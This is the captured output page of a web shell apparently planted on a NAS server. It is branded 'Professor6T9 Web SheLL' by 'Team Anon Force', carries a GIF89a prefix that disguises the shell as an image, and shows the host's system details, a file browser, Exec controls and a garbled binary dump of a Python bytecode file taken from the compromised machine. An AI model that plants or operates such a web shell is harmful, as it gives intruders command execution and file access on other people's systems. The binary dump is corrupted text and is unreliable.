GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Python3.9
/
usr
/
lib
/
python3.9
/
multiprocessing
/
__pycache__
[ HOME ]
Exec
Submit
File Name : synchronize.cpython-39.opt-1.pyc
a hZ- � @ s" g d �Z ddlZddlZddlZddlZddlZddlmZ ddlmZ ddlm Z zddlm Z mZ W n ey� ed��Y n0 e ed ��\ZZej jZG d d� de�Z G dd � d e �ZG dd� de�ZG dd� de �ZG dd� de �ZG dd� de�ZG dd� de�ZG dd� dej�ZdS ))�Lock�RLock� Semaphore�BoundedSemaphore� Condition�Event� N� )�context)�process)�util)�SemLock� sem_unlinkz�This platform lacks a functioning sem_open implementation, therefore, the required synchronization primitives needed will not function, see issue 3770.� c @ s\ e Zd Ze�� Zdd� Zedd� �Zdd� Z dd� Z d d � Zdd� Zd d� Z edd� �ZdS )r c C s� |d u rt j�� }|�� }tjdkp*|dk}td�D ]<}z t�|||| � � |� }| _ W n tyj Y q40 qzq4td��t� d|j � | �� tjdkr�dd� } t�| | � | j jd ur�dd lm} | | j jd � tj| tj| j jfdd� d S ) N�win32�fork�d zcannot find name for semaphorezcreated semlock with handle %sc S s | j �� d S �N)�_semlock�_after_fork)�obj� r �>/tmp/_install/usr/lib/python3.9/multiprocessing/synchronize.pyr G s z%SemLock.__init__.<locals>._after_forkr )�register� semaphorer )Zexitpriority)r Z_default_contextZget_contextZget_start_method�sys�platform�range�_multiprocessingr � _make_namer �FileExistsErrorr �debug�handle� _make_methodsZregister_after_fork�name�resource_trackerr ZFinalize�_cleanup)�self�kind�value�maxvalue�ctxr# Z unlink_now�i�slr r r r r �__init__2 s2 � �zSemLock.__init__c C s"